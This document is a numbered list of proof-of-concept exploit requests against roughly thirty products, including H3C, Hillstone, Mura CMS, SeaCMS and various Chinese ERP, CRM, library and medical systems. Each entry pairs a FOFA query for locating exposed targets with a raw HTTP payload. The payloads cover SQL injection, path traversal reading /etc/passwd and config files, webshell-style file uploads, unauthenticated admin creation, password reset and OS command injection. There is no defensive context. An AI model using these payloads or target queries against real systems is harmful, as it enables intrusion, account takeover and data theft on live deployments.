/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexfileupload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical viewer system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"

POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone (山石网科) 云鉴 Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"

GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
The vulnerability is present if a request to /servlet/uploadAttachmentServlet returns a response.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 (Volans) Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"

POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"

POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"

GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. Aliyun Drive (阿里云盘) WebDAV command injection
CVE-2024-29640

GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager_upload interface file upload
Fofa:title="Authenticate Please!"

1. Send the PoC request to obtain the CSRF value, then obtain a cookie, then upload and access the file to get the result:

GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"

GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder (方正) All-Media News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"

POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 (WeEngine) AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"

Obtain the __VIEWSTATE and __EVENTVALIDATION values:

GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:

POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"

POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--